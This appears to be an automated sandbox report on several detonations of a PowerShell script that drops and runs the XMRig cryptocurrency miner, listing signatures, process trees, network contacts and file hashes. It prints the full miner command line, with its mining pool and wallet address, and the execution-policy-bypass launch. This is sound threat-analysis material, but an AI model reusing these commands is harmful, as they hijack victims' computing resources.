SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral25

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:06

Platform

win10v2004-20240508-en

Max time kernel

1795s

Max time network

1800s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4036,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=4312 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3600,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=3604 /prefetch:8

Network

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uxaalfak.j1d.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral30

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:11

Platform

win10-20240404-en

Max time kernel

1796s

Max time network

1770s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kdw1e00x.fqe.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 01:37

Platform

win10-20240404-en

Max time kernel

1797s

Max time network

1752s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xi3e0n33.1ki.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral5

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 01:38

Platform

win10v2004-20240508-en

Max time kernel

1789s

Max time network

1795s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 52.111.229.43:443 N/A tcp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 168.253.116.51.in-addr.arpa udp

Files

memory/4336-0-0x00007FFCBF2A3000-0x00007FFCBF2A5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wnyzmc4h.zb5.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4336-10-0x00000156A7D10000-0x00000156A7D32000-memory.dmp

memory/4336-11-0x00007FFCBF2A0000-0x00007FFCBFD61000-memory.dmp

memory/4336-12-0x00007FFCBF2A0000-0x00007FFCBFD61000-memory.dmp

memory/4336-14-0x00007FFCBF2A0000-0x00007FFCBFD61000-memory.dmp

memory/4336-16-0x000001568EE90000-0x000001568EE9A000-memory.dmp

memory/4336-15-0x00000156A7D40000-0x00000156A7D52000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4752-47-0x000001C184170000-0x000001C184190000-memory.dmp

memory/4752-48-0x000001C185970000-0x000001C185990000-memory.dmp

memory/4752-49-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-50-0x000001C185990000-0x000001C1859B0000-memory.dmp

memory/4752-51-0x000001C1859B0000-0x000001C1859D0000-memory.dmp

memory/4752-52-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4336-53-0x00007FFCBF2A3000-0x00007FFCBF2A5000-memory.dmp

memory/4336-54-0x00007FFCBF2A0000-0x00007FFCBFD61000-memory.dmp

memory/4752-55-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4336-56-0x00007FFCBF2A0000-0x00007FFCBFD61000-memory.dmp

memory/4752-57-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-59-0x000001C1859B0000-0x000001C1859D0000-memory.dmp

memory/4752-58-0x000001C185990000-0x000001C1859B0000-memory.dmp

memory/4752-60-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-61-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-62-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-63-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-64-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-65-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-66-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-67-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-68-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-69-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-70-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-71-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-72-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-73-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-74-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-75-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-76-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-77-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-78-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-79-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-80-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-81-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-82-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-83-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-84-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-85-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-86-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-87-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-88-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-89-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-90-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-91-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-92-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-93-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-94-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-95-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-96-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-97-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-98-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-99-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-100-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-101-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-102-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-103-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-104-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-105-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-106-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-107-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-108-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-109-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-110-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-111-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-112-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-113-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-114-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-115-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-116-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-117-0x00007FF724850000-0x00007FF725483000-memory.dmp

memory/4752-118-0x00007FF724850000-0x00007FF725483000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 01:39

Platform

win11-20240426-en

Max time kernel

1789s

Max time network

1765s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

memory/1096-0-0x00007FFF3C5D3000-0x00007FFF3C5D5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t0xtc2pi.5dj.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1096-6-0x00007FFF3C5D0000-0x00007FFF3D092000-memory.dmp

memory/1096-10-0x000001C752230000-0x000001C752252000-memory.dmp

memory/1096-11-0x00007FFF3C5D0000-0x00007FFF3D092000-memory.dmp

memory/1096-12-0x00007FFF3C5D0000-0x00007FFF3D092000-memory.dmp

memory/1096-14-0x000001C76ABB0000-0x000001C76ABC2000-memory.dmp

memory/1096-15-0x000001C7522F0000-0x000001C7522FA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4064-46-0x00000151C94C0000-0x00000151C94E0000-memory.dmp

memory/4064-47-0x00000151C9870000-0x00000151C9890000-memory.dmp

memory/4064-48-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/1096-49-0x00007FFF3C5D0000-0x00007FFF3D092000-memory.dmp

memory/4064-52-0x00000151CAFC0000-0x00000151CAFE0000-memory.dmp

memory/4064-53-0x00000151CAFE0000-0x00000151CB000000-memory.dmp

memory/4064-50-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/1096-51-0x00007FFF3C5D3000-0x00007FFF3C5D5000-memory.dmp

memory/4064-54-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-55-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-57-0x00000151CAFE0000-0x00000151CB000000-memory.dmp

memory/4064-56-0x00000151CAFC0000-0x00000151CAFE0000-memory.dmp

memory/4064-58-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-59-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-60-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-61-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-62-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-63-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

memory/4064-64-0x00007FF7721D0000-0x00007FF772E03000-memory.dmp

